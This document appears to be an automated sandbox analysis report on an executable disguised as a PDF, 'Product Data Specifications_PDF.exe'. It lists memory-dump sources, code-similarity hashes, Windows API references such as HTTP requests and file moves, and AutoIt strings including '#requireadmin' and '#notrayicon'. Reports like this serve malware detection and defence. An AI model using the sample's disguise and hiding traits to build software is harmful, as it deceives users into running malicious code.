                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                              • String ID:
                              • API String ID: 978794511-0
                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_memcmp
                              • String ID: '$\$h
                              • API String ID: 2205784470-1303700344
                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                              APIs
                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                              • VariantClear.OLEAUT32 ref: 0045EA6D
                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                              • __swprintf.LIBCMT ref: 0045EC33
                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                              Strings
                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                              • String ID: %4d%02d%02d%02d%02d%02d
                              • API String ID: 2441338619-1568723262
                              • Opcode ID: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                              • Opcode Fuzzy Hash: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID: @COM_EVENTOBJ
                              • API String ID: 327565842-2228938565
                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                              APIs
                              • VariantClear.OLEAUT32(?), ref: 0047031B
                              • VariantClear.OLEAUT32(?), ref: 0047044F
                              • VariantInit.OLEAUT32(?), ref: 004704A3
                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                              • VariantClear.OLEAUT32(?), ref: 00470516
                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                              • String ID: H
                              • API String ID: 3613100350-2852464175
                              • Opcode ID: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                              • Opcode Fuzzy Hash: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                              • DestroyWindow.USER32(?), ref: 00426F50
                              • UnregisterHotKey.USER32(?), ref: 00426F77
                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                              • String ID: close all
                              • API String ID: 4174999648-3243417748
                              • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                              • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                              • String ID:
                              • API String ID: 1291720006-3916222277
                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                              • IsMenu.USER32(?), ref: 0045FC5F
                              • CreatePopupMenu.USER32 ref: 0045FC97
                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                              • String ID: 0$2
                              • API String ID: 93392585-3793063076
                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                              APIs
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                              • VariantClear.OLEAUT32(?), ref: 00435320
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                              • VariantClear.OLEAUT32(?), ref: 004353B3
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                              • String ID: crts
                              • API String ID: 586820018-3724388283
                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,0040F545,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,004A90E8,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,?,0040F545), ref: 0041013C
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                              • _wcscat.LIBCMT ref: 0044BCAF
                              • _wcslen.LIBCMT ref: 0044BCBB
                              • _wcslen.LIBCMT ref: 0044BCD1
                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                              • String ID: \*.*
                              • API String ID: 2326526234-1173974218
                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                              APIs
                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                              • _wcslen.LIBCMT ref: 004335F2
                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                              • GetLastError.KERNEL32 ref: 0043362B
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                              • _wcsrchr.LIBCMT ref: 00433666
                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                              • String ID: \
                              • API String ID: 321622961-2967466578
                              • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                              • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                              • API String ID: 1038674560-2734436370
                              • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                              • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                              • __lock.LIBCMT ref: 00417981
                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                              • __lock.LIBCMT ref: 004179A2
                              • ___addlocaleref.LIBCMT ref: 004179C0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$pI
                              • API String ID: 637971194-197072765
                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_malloc
                              • String ID:
                              • API String ID: 1938898002-0
                              • Opcode ID: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                              • Opcode Fuzzy Hash: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                              • _memmove.LIBCMT ref: 0044B555
                              • _memmove.LIBCMT ref: 0044B578
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
